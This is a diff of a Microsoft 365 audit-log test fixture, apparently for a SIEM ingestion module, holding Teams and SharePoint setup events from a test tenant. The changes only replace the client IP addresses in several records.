 {"CreationTime":"2021-02-05T09:07:58","Id":"f16cc0cc-2a18-580e-83c5-04d3c385ebb8","Operation":"MemberAdded","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":25,"UserKey":"21119711-1517-43d4-8138-b537dafad016","UserType":0,"Version":1,"Workload":"MicrosoftTeams","UserId":"root@testsiem4.onmicrosoft.com","AADGroupId":"61b6d6f5-7aa0-437b-a967-fbcd39ec90a1","CommunicationType":"Team","Members":[{"DisplayName":"Adrian Serrano","Role":2,"UPN":"admin@testsiem4.onmicrosoft.com"},{"DisplayName":"Eve","Role":2,"UPN":"eve@testsiem4.onmicrosoft.com"}],"TeamGuid":"19:5b5e23f8af084c2188311d38cd51ac0f@thread.tacv2","ItemName":"users","TeamName":"users"}
-{"CreationTime":"2021-02-05T09:08:13","Id":"6454a7d9-afae-4a6c-ffa5-08d8c9b5911c","Operation":"ListColumnUpdated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":56,"UserKey":"i:0h.f|membership|1003200112eb07e6@live.com","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"52.114.88.180","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users\/66afcf95-7cd2-4b68-a3e8-3383d908b8f2\/28cf69c5-fa48-462a-b5cd-27b6f9d2bd5f","UserId":"root@testsiem4.onmicrosoft.com","ApplicationDisplayName":"Microsoft Teams Services","ApplicationId":"cc15fd57-2c6c-4117-a88c-83b1d56b4bbe","CorrelationId":"fc39a89f-5054-2000-9ced-83aa1cf560fd","DoNotDistributeEvent":true,"EventSource":"SharePoint","ItemType":"Field","ListId":"66afcf95-7cd2-4b68-a3e8-3383d908b8f2","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"SkypeSpaces\/1.0a$*+","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","FromApp":false,"IsDocLib":true,"ItemCount":1,"ListBaseTemplateType":"101","ListBaseType":"DocumentLibrary","ListColor":"","ListIcon":"","TemplateTypeId":"","ListTitle":"66afcf95-7cd2-4b68-a3e8-3383d908b8f2"}
-{"CreationTime":"2021-02-05T09:08:12","Id":"6d69552c-2019-4f7c-92bc-08d8c9b5908b","Operation":"FolderCreated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":6,"UserKey":"i:0h.f|membership|1003200112eb07e6@live.com","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"52.114.88.180","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users\/Shared Documents\/General","UserId":"root@testsiem4.onmicrosoft.com","ApplicationDisplayName":"Microsoft Teams Services","ApplicationId":"cc15fd57-2c6c-4117-a88c-83b1d56b4bbe","CorrelationId":"fc39a89f-b01b-2000-9ced-879789d2d8e5","EventSource":"SharePoint","ItemType":"Folder","ListId":"66afcf95-7cd2-4b68-a3e8-3383d908b8f2","ListItemUniqueId":"81d4cd08-7ffb-45d2-a422-86a9a9335d66","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"SkypeSpaces\/1.0a$*+","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","SourceFileExtension":"","SiteUrl":"https:\/\/testsiem4.sharepoint.com\/sites\/users\/","SourceFileName":"General","SourceRelativeUrl":"Shared Documents"}
+{"CreationTime":"2021-02-05T09:08:13","Id":"6454a7d9-afae-4a6c-ffa5-08d8c9b5911c","Operation":"ListColumnUpdated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":56,"UserKey":"i:0h.f|membership|1003200112eb07e6@live.com","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"81.2.69.143","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users\/66afcf95-7cd2-4b68-a3e8-3383d908b8f2\/28cf69c5-fa48-462a-b5cd-27b6f9d2bd5f","UserId":"root@testsiem4.onmicrosoft.com","ApplicationDisplayName":"Microsoft Teams Services","ApplicationId":"cc15fd57-2c6c-4117-a88c-83b1d56b4bbe","CorrelationId":"fc39a89f-5054-2000-9ced-83aa1cf560fd","DoNotDistributeEvent":true,"EventSource":"SharePoint","ItemType":"Field","ListId":"66afcf95-7cd2-4b68-a3e8-3383d908b8f2","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"SkypeSpaces\/1.0a$*+","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","FromApp":false,"IsDocLib":true,"ItemCount":1,"ListBaseTemplateType":"101","ListBaseType":"DocumentLibrary","ListColor":"","ListIcon":"","TemplateTypeId":"","ListTitle":"66afcf95-7cd2-4b68-a3e8-3383d908b8f2"}
+{"CreationTime":"2021-02-05T09:08:12","Id":"6d69552c-2019-4f7c-92bc-08d8c9b5908b","Operation":"FolderCreated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":6,"UserKey":"i:0h.f|membership|1003200112eb07e6@live.com","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"81.2.69.143","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users\/Shared Documents\/General","UserId":"root@testsiem4.onmicrosoft.com","ApplicationDisplayName":"Microsoft Teams Services","ApplicationId":"cc15fd57-2c6c-4117-a88c-83b1d56b4bbe","CorrelationId":"fc39a89f-b01b-2000-9ced-879789d2d8e5","EventSource":"SharePoint","ItemType":"Folder","ListId":"66afcf95-7cd2-4b68-a3e8-3383d908b8f2","ListItemUniqueId":"81d4cd08-7ffb-45d2-a422-86a9a9335d66","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"SkypeSpaces\/1.0a$*+","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","SourceFileExtension":"","SiteUrl":"https:\/\/testsiem4.sharepoint.com\/sites\/users\/","SourceFileName":"General","SourceRelativeUrl":"Shared Documents"}
 {"CreationTime":"2021-02-05T09:07:57","Id":"6e9fc7e0-158a-4456-2a89-08d8c9b58771","Operation":"AddedToGroup","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":14,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users","UserId":"app@sharepoint","CorrelationId":"4eb429d5-cf62-4a12-a3f6-526628c81d78","EventSource":"SharePoint","ItemType":"Web","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","EventData":"<Group>Site Members<\/Group>","TargetUserOrGroupType":"SecurityGroup","SiteUrl":"https:\/\/testsiem4.sharepoint.com\/sites\/users","TargetUserOrGroupName":"Everyone except external users"}
 {"CreationTime":"2021-02-05T09:07:56","Id":"a9b8277d-d3b9-4d99-0491-08d8c9b5874b","Operation":"AddedToGroup","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":14,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users","UserId":"app@sharepoint","CorrelationId":"4eb429d5-cf62-4a12-a3f6-526628c81d78","EventSource":"SharePoint","ItemType":"Web","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","EventData":"<Group>Site Owners<\/Group>","TargetUserOrGroupType":"Member","SiteUrl":"https:\/\/testsiem4.sharepoint.com\/sites\/users","TargetUserOrGroupName":"SHAREPOINT\\system"}
 {"CreationTime":"2021-02-05T09:07:56","Id":"dfef0880-e895-47e1-2e39-08d8c9b58733","Operation":"AddedToGroup","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":14,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users","UserId":"app@sharepoint","CorrelationId":"4eb429d5-cf62-4a12-a3f6-526628c81d78","EventSource":"SharePoint","ItemType":"Web","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","EventData":"<Group>Site Owners<\/Group>","TargetUserOrGroupType":"SecurityGroup","SiteUrl":"https:\/\/testsiem4.sharepoint.com\/sites\/users","TargetUserOrGroupName":"users Owners"}
 {"CreationTime":"2021-02-05T09:07:56","Id":"d9b6f410-30c7-42a0-0820-08d8c9b5872c","Operation":"AddedToGroup","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":14,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users","UserId":"app@sharepoint","CorrelationId":"4eb429d5-cf62-4a12-a3f6-526628c81d78","EventSource":"SharePoint","ItemType":"Web","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","EventData":"<Group>Site Members<\/Group>","TargetUserOrGroupType":"SecurityGroup","SiteUrl":"https:\/\/testsiem4.sharepoint.com\/sites\/users","TargetUserOrGroupName":"users Members"}
 {"CreationTime":"2021-02-05T09:07:56","Id":"5c82c14e-525e-44f4-7cd7-08d8c9b58722","Operation":"AddedToGroup","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":14,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users","UserId":"app@sharepoint","CorrelationId":"4eb429d5-cf62-4a12-a3f6-526628c81d78","EventSource":"SharePoint","ItemType":"Web","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","EventData":"<Group>Site Owners<\/Group>","TargetUserOrGroupType":"Member","SiteUrl":"https:\/\/testsiem4.sharepoint.com\/sites\/users","TargetUserOrGroupName":"SHAREPOINT\\system"}
-{"CreationTime":"2021-02-05T09:07:56","Id":"f576a30e-1734-4f42-f3b3-08d8c9b58718","Operation":"SiteCollectionCreated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":4,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"20.190.143.50","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users","UserId":"app@sharepoint","ApplicationDisplayName":"Microsoft Graph","ApplicationId":"00000006-0000-0ff1-ce00-000000000000","CorrelationId":"4eb429d5-cf62-4a12-a3f6-526628c81d78","EventSource":"SharePoint","ItemType":"Site","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"","EventData":"<SiteCreationSource>O365AdminCenter<\/SiteCreationSource><TenantSettings.ShowCreateSiteCommand>True<\/TenantSettings.ShowCreateSiteCommand><TenantSettings.UseCustomSiteCreationForm>False<\/TenantSettings.UseCustomSiteCreationForm>"}
+{"CreationTime":"2021-02-05T09:07:56","Id":"f576a30e-1734-4f42-f3b3-08d8c9b58718","Operation":"SiteCollectionCreated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":4,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"81.2.69.193","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users","UserId":"app@sharepoint","ApplicationDisplayName":"Microsoft Graph","ApplicationId":"00000006-0000-0ff1-ce00-000000000000","CorrelationId":"4eb429d5-cf62-4a12-a3f6-526628c81d78","EventSource":"SharePoint","ItemType":"Site","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"","EventData":"<SiteCreationSource>O365AdminCenter<\/SiteCreationSource><TenantSettings.ShowCreateSiteCommand>True<\/TenantSettings.ShowCreateSiteCommand><TenantSettings.UseCustomSiteCreationForm>False<\/TenantSettings.UseCustomSiteCreationForm>"}
 {"CreationTime":"2021-02-05T09:07:56","Id":"f84f38b0-1963-4a1d-454e-08d8c9b586e9","Operation":"AddedToGroup","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":14,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users","UserId":"app@sharepoint","CorrelationId":"4eb429d5-cf62-4a12-a3f6-526628c81d78","EventSource":"SharePoint","ItemType":"Web","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","EventData":"<Group>Site Owners<\/Group>","TargetUserOrGroupType":"SecurityGroup","SiteUrl":"https:\/\/testsiem4.sharepoint.com\/sites\/users","TargetUserOrGroupName":"users Owners"}
 {"CreationTime":"2021-02-05T09:07:55","Id":"e85ec350-af23-47a7-5b33-08d8c9b586be","Operation":"AddedToGroup","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":14,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users","UserId":"app@sharepoint","CorrelationId":"4eb429d5-cf62-4a12-a3f6-526628c81d78","EventSource":"SharePoint","ItemType":"Web","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","EventData":"<Group>Site Owners<\/Group>","TargetUserOrGroupType":"Member","SiteUrl":"https:\/\/testsiem4.sharepoint.com\/sites\/users","TargetUserOrGroupName":"SHAREPOINT\\system"}
-{"CreationTime":"2021-02-05T09:08:14","Id":"32474de1-fca7-4d81-4f97-08d8c9b591a4","Operation":"ListUpdated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":36,"UserKey":"i:0h.f|membership|1003200112eb07e6@live.com","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"52.114.88.180","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users\/96cdfc22-2b86-49ea-b4e9-f11888b1665d","UserId":"root@testsiem4.onmicrosoft.com","ApplicationDisplayName":"Microsoft Teams Services","ApplicationId":"cc15fd57-2c6c-4117-a88c-83b1d56b4bbe","CorrelationId":"fc39a89f-4077-2000-7abb-cbd546e4157d","DoNotDistributeEvent":true,"EventSource":"SharePoint","ItemType":"List","ListId":"96cdfc22-2b86-49ea-b4e9-f11888b1665d","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"SkypeSpaces\/1.0a$*+","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","FromApp":false,"IsDocLib":true,"ItemCount":0,"ListBaseTemplateType":"101","ListBaseType":"DocumentLibrary","ListColor":"","ListIcon":"","TemplateTypeId":"","ListTitle":"96cdfc22-2b86-49ea-b4e9-f11888b1665d"}
-{"CreationTime":"2021-02-05T09:08:14","Id":"20b7fc96-6e31-437a-50fa-08d8c9b59185","Operation":"ListCreated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":36,"UserKey":"i:0h.f|membership|1003200112eb07e6@live.com","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"52.114.88.180","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users\/SiteAssets","UserId":"root@testsiem4.onmicrosoft.com","ApplicationDisplayName":"Microsoft Teams Services","ApplicationId":"cc15fd57-2c6c-4117-a88c-83b1d56b4bbe","CorrelationId":"fc39a89f-4077-2000-7abb-cbd546e4157d","EventSource":"SharePoint","ItemType":"List","ListId":"96cdfc22-2b86-49ea-b4e9-f11888b1665d","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"SkypeSpaces\/1.0a$*+","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","ListBaseTemplateType":"DocumentLibrary","ListBaseType":"DocumentLibrary","ListTitle":"96CDFC22-2B86-49EA-B4E9-F11888B1665D"}
-{"CreationTime":"2021-02-05T09:08:17","Id":"3813eef0-90e1-4758-54d8-08d8c9b5938e","Operation":"ListColumnUpdated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":56,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"51.141.50.227","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users\/96cdfc22-2b86-49ea-b4e9-f11888b1665d\/03e45e84-1992-4d42-9116-26f756012634","UserId":"app@sharepoint","ApplicationDisplayName":"OneNote","ApplicationId":"2d4d3d8e-2be3-4bef-9f87-7875a61c29de","CorrelationId":"fd39a89f-9050-2000-7abb-ce79fabfa6c0","DoNotDistributeEvent":true,"EventSource":"SharePoint","ItemType":"Field","ListId":"96cdfc22-2b86-49ea-b4e9-f11888b1665d","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"onenoteapi","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","FromApp":false,"IsDocLib":true,"ItemCount":1,"ListBaseTemplateType":"101","ListBaseType":"DocumentLibrary","ListColor":"","ListIcon":"","TemplateTypeId":"","ListTitle":"96cdfc22-2b86-49ea-b4e9-f11888b1665d"}
-{"CreationTime":"2021-02-05T09:08:17","Id":"597a6c1b-fa1f-46aa-f2ce-08d8c9b5938b","Operation":"ListColumnUpdated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":56,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"51.141.50.227","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users\/96cdfc22-2b86-49ea-b4e9-f11888b1665d\/0c5e0085-eb30-494b-9cdd-ece1d3c649a2","UserId":"app@sharepoint","ApplicationDisplayName":"OneNote","ApplicationId":"2d4d3d8e-2be3-4bef-9f87-7875a61c29de","CorrelationId":"fd39a89f-9050-2000-7abb-ce79fabfa6c0","DoNotDistributeEvent":true,"EventSource":"SharePoint","ItemType":"Field","ListId":"96cdfc22-2b86-49ea-b4e9-f11888b1665d","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"onenoteapi","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","FromApp":false,"IsDocLib":true,"ItemCount":1,"ListBaseTemplateType":"101","ListBaseType":"DocumentLibrary","ListColor":"","ListIcon":"","TemplateTypeId":"","ListTitle":"96cdfc22-2b86-49ea-b4e9-f11888b1665d"}
-{"CreationTime":"2021-02-05T09:08:17","Id":"f4579e76-fb4b-4434-904e-08d8c9b59389","Operation":"ListColumnUpdated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":56,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"51.141.50.227","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users\/96cdfc22-2b86-49ea-b4e9-f11888b1665d\/39360f11-34cf-4356-9945-25c44e68dade","UserId":"app@sharepoint","ApplicationDisplayName":"OneNote","ApplicationId":"2d4d3d8e-2be3-4bef-9f87-7875a61c29de","CorrelationId":"fd39a89f-9050-2000-7abb-ce79fabfa6c0","DoNotDistributeEvent":true,"EventSource":"SharePoint","ItemType":"Field","ListId":"96cdfc22-2b86-49ea-b4e9-f11888b1665d","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"onenoteapi","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","FromApp":false,"IsDocLib":true,"ItemCount":1,"ListBaseTemplateType":"101","ListBaseType":"DocumentLibrary","ListColor":"","ListIcon":"","TemplateTypeId":"","ListTitle":"96cdfc22-2b86-49ea-b4e9-f11888b1665d"}
-{"CreationTime":"2021-02-05T09:08:17","Id":"b401dd51-f4a2-477f-cc42-08d8c9b59384","Operation":"ListColumnUpdated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":56,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"51.141.50.227","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users\/66afcf95-7cd2-4b68-a3e8-3383d908b8f2\/03e45e84-1992-4d42-9116-26f756012634","UserId":"app@sharepoint","ApplicationDisplayName":"OneNote","ApplicationId":"2d4d3d8e-2be3-4bef-9f87-7875a61c29de","CorrelationId":"fd39a89f-9050-2000-7abb-ce79fabfa6c0","DoNotDistributeEvent":true,"EventSource":"SharePoint","ItemType":"Field","ListId":"66afcf95-7cd2-4b68-a3e8-3383d908b8f2","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"onenoteapi","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","FromApp":false,"IsDocLib":true,"ItemCount":1,"ListBaseTemplateType":"101","ListBaseType":"DocumentLibrary","ListColor":"","ListIcon":"","TemplateTypeId":"","ListTitle":"66afcf95-7cd2-4b68-a3e8-3383d908b8f2"}
-{"CreationTime":"2021-02-05T09:08:17","Id":"073f437c-2e04-441a-05ad-08d8c9b59380","Operation":"ListColumnUpdated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":56,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"51.141.50.227","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users\/66afcf95-7cd2-4b68-a3e8-3383d908b8f2\/0c5e0085-eb30-494b-9cdd-ece1d3c649a2","UserId":"app@sharepoint","ApplicationDisplayName":"OneNote","ApplicationId":"2d4d3d8e-2be3-4bef-9f87-7875a61c29de","CorrelationId":"fd39a89f-9050-2000-7abb-ce79fabfa6c0","DoNotDistributeEvent":true,"EventSource":"SharePoint","ItemType":"Field","ListId":"66afcf95-7cd2-4b68-a3e8-3383d908b8f2","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"onenoteapi","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","FromApp":false,"IsDocLib":true,"ItemCount":1,"ListBaseTemplateType":"101","ListBaseType":"DocumentLibrary","ListColor":"","ListIcon":"","TemplateTypeId":"","ListTitle":"66afcf95-7cd2-4b68-a3e8-3383d908b8f2"}
-{"CreationTime":"2021-02-05T09:08:17","Id":"8f586afb-1438-475e-a4d5-08d8c9b5937d","Operation":"ListColumnUpdated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":56,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"51.141.50.227","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users\/66afcf95-7cd2-4b68-a3e8-3383d908b8f2\/39360f11-34cf-4356-9945-25c44e68dade","UserId":"app@sharepoint","ApplicationDisplayName":"OneNote","ApplicationId":"2d4d3d8e-2be3-4bef-9f87-7875a61c29de","CorrelationId":"fd39a89f-9050-2000-7abb-ce79fabfa6c0","DoNotDistributeEvent":true,"EventSource":"SharePoint","ItemType":"Field","ListId":"66afcf95-7cd2-4b68-a3e8-3383d908b8f2","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"onenoteapi","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","FromApp":false,"IsDocLib":true,"ItemCount":1,"ListBaseTemplateType":"101","ListBaseType":"DocumentLibrary","ListColor":"","ListIcon":"","TemplateTypeId":"","ListTitle":"66afcf95-7cd2-4b68-a3e8-3383d908b8f2"}
+{"CreationTime":"2021-02-05T09:08:14","Id":"32474de1-fca7-4d81-4f97-08d8c9b591a4","Operation":"ListUpdated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":36,"UserKey":"i:0h.f|membership|1003200112eb07e6@live.com","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"81.2.69.143","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users\/96cdfc22-2b86-49ea-b4e9-f11888b1665d","UserId":"root@testsiem4.onmicrosoft.com","ApplicationDisplayName":"Microsoft Teams Services","ApplicationId":"cc15fd57-2c6c-4117-a88c-83b1d56b4bbe","CorrelationId":"fc39a89f-4077-2000-7abb-cbd546e4157d","DoNotDistributeEvent":true,"EventSource":"SharePoint","ItemType":"List","ListId":"96cdfc22-2b86-49ea-b4e9-f11888b1665d","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"SkypeSpaces\/1.0a$*+","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","FromApp":false,"IsDocLib":true,"ItemCount":0,"ListBaseTemplateType":"101","ListBaseType":"DocumentLibrary","ListColor":"","ListIcon":"","TemplateTypeId":"","ListTitle":"96cdfc22-2b86-49ea-b4e9-f11888b1665d"}
+{"CreationTime":"2021-02-05T09:08:14","Id":"20b7fc96-6e31-437a-50fa-08d8c9b59185","Operation":"ListCreated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":36,"UserKey":"i:0h.f|membership|1003200112eb07e6@live.com","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"81.2.69.143","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users\/SiteAssets","UserId":"root@testsiem4.onmicrosoft.com","ApplicationDisplayName":"Microsoft Teams Services","ApplicationId":"cc15fd57-2c6c-4117-a88c-83b1d56b4bbe","CorrelationId":"fc39a89f-4077-2000-7abb-cbd546e4157d","EventSource":"SharePoint","ItemType":"List","ListId":"96cdfc22-2b86-49ea-b4e9-f11888b1665d","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"SkypeSpaces\/1.0a$*+","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","ListBaseTemplateType":"DocumentLibrary","ListBaseType":"DocumentLibrary","ListTitle":"96CDFC22-2B86-49EA-B4E9-F11888B1665D"}
+{"CreationTime":"2021-02-05T09:08:17","Id":"3813eef0-90e1-4758-54d8-08d8c9b5938e","Operation":"ListColumnUpdated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":56,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"175.16.199.1","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users\/96cdfc22-2b86-49ea-b4e9-f11888b1665d\/03e45e84-1992-4d42-9116-26f756012634","UserId":"app@sharepoint","ApplicationDisplayName":"OneNote","ApplicationId":"2d4d3d8e-2be3-4bef-9f87-7875a61c29de","CorrelationId":"fd39a89f-9050-2000-7abb-ce79fabfa6c0","DoNotDistributeEvent":true,"EventSource":"SharePoint","ItemType":"Field","ListId":"96cdfc22-2b86-49ea-b4e9-f11888b1665d","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"onenoteapi","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","FromApp":false,"IsDocLib":true,"ItemCount":1,"ListBaseTemplateType":"101","ListBaseType":"DocumentLibrary","ListColor":"","ListIcon":"","TemplateTypeId":"","ListTitle":"96cdfc22-2b86-49ea-b4e9-f11888b1665d"}
+{"CreationTime":"2021-02-05T09:08:17","Id":"597a6c1b-fa1f-46aa-f2ce-08d8c9b5938b","Operation":"ListColumnUpdated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":56,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"175.16.199.1","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users\/96cdfc22-2b86-49ea-b4e9-f11888b1665d\/0c5e0085-eb30-494b-9cdd-ece1d3c649a2","UserId":"app@sharepoint","ApplicationDisplayName":"OneNote","ApplicationId":"2d4d3d8e-2be3-4bef-9f87-7875a61c29de","CorrelationId":"fd39a89f-9050-2000-7abb-ce79fabfa6c0","DoNotDistributeEvent":true,"EventSource":"SharePoint","ItemType":"Field","ListId":"96cdfc22-2b86-49ea-b4e9-f11888b1665d","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"onenoteapi","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","FromApp":false,"IsDocLib":true,"ItemCount":1,"ListBaseTemplateType":"101","ListBaseType":"DocumentLibrary","ListColor":"","ListIcon":"","TemplateTypeId":"","ListTitle":"96cdfc22-2b86-49ea-b4e9-f11888b1665d"}
